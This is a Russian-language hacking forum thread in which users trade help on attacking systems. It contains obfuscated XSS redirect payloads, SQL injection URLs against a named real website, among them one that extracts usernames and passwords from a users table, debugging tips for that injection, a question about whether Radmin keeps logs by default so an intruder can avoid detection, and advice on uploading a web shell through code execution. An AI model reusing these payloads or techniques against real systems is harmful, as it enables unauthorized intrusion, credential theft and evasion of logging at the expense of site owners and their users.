Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Проверки нету. Ресайз идет.
    Значит никак?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Вроде нет, ну по крайней мере я не знаю
     
  3. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Ктонить знает, радмин в2.1 и в 2.2 по умалчанию хранит ли логи?
    Стоит мне об этом беспокоиться?
    Плиз. дайте совет. (с меня +)
     
  4. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Для долбоёбов, я даже специально выделил слово "умалчаение"
     
  5. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
     
  6. $n@ke

    [email protected] Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    697
    Likes Received:
    404
    Reputations:
    134
    Всё обыскал, всех опросил, ну никто не знает хранит ли Радмин логи по умАлчанию(( так что ничем помочь наверно не смогу.

    Но вот мануаль,который так трудно было найти на сайте производителя Радмин, и в гугле его вобще нет на первом месте в странице результатов
    (ССылка на мануаль, ВЫ ТОЛЬКО ПРЕДСТАВЬТЕ!!!!!!! на ВТОРОМ МЕСТЕ!!ААА..какой ужас) предложил вариант со словом умОлчание, хотя это конечно бред скорее всего, но может и что-то полезное будет.

    Для тех,кто не хочет тратить свое время, я подчеркиваю, для ДОЛБО..ой, то есть для Exploit, привожу фрагмент мануала:
     
  7. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Нет, по дефолту не хранит.
     
  8. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    Возможноли через конструкцию выполнения скрипта javascript:.... (например javascript=alert()) сделать код для редиректа ? Например с использованием eval - javascript:eval("злой_код")
    И как это можно сделать. А если низя, то почему ?
     
  9. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    <img src=. onerror=eval("document.location.href='http://google.com/';")>
    <img src=. onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109,47,39,59))>
    Думаю понятно.

    вместо "=" должно быть ":", хотя подозреваю, что просто опечатка)
     
  10. cupper

    cupper Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    369
    Likes Received:
    92
    Reputations:
    5
    Понятно, но я не это имел ввиду. Нужно чтото вроде
    <img src="javascript:ЗЛОЙ_КОД_ДЛЯ_РЕДИРЕКТА">
    спросите почему так - потомучто что я не слова неговорил про img вообще, а если тег не img и нету в теге параметров типа onerror... А есть проста возможность вставить куданибуть конструкцию javascript:...

    вот в чем вся соль (с) ...
     
  11. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    src=javscript:eval("document.location.href='http://google.com/';")
    src=javscript:eval(String.fromCharCode(100,111,99,117,10 9,101,110,116,46,108,111,99,97,116,105,111,110,46, 104,114,101,102,61,39,104,116,116,112,58,47,47,103 ,111,111,103,108,101,46,99,111,109,47,39,59))
    Не вижу никакой разницы.
     
    1 person likes this.
  12. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    Не могу понять, в
    HTML:
    http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
    все норм показывает, видимые поля есть, все дела.
    Как только ввожу
    HTML:
    http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables--
    показывает ошибку, что за беда подскажите плз.
     
  13. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Gemini12, коментарий "--" требует пробел в конце.
    Во вторых версия мускула 4я, в ней нет information_schema.
     
    1 person likes this.
  14. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    2BlackSun
    Не мог бы скинуть ссылочку на список таблиц 4 мускули если не затруднит. Очень надо плз.
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 Gemini12:

    такого списка нет. Есть словари для брута - таблиц и колонок. Имеются в комплекте у SIPT4. У всех разные. У кого больше, у кого меньше
     
    1 person likes this.
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Есть уязвимость на одном популярном(!) сервисе (форуме). На оооочень популярном. Каждый античатовец знает его, или был там хотя бы раз. Уязвимость заключается в том, что на форум можно заливать файл на любой(!) пост. Пример: мой ник mailbrush. Ник юзера, скажем hackadmin. hackadmin написал пост бла бла бла, онтоле похекал майкрософт. Я могу к этому посту прилепить свой файл. Стоит ли эта уязвимость отдельной темы в разделе "УЯЗВИМОСТИ" или пока держать это в привате?
     
  17. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Чего полезного из этого можно извлечь ?

    http://www.dialog.kz/?lan=ru&id=92&pub=-1+union+select+1,2,3,4,concat_ws(0x2F,username,userpass),6,7,8,9,10,11,12,13,14+from+users--+
     
  18. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Иммется выполнение кода типа file?c=phpinfo();
    пождскажите как через это залить шелл?
     
  19. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    wget
     
  20. Explоit

    Explоit Banned

    Joined:
    21 Jul 2009
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    а если его нету в системе? + вырублена функция system(),exex(),passtru()
     
Loading...
Thread Status:
Not open for further replies.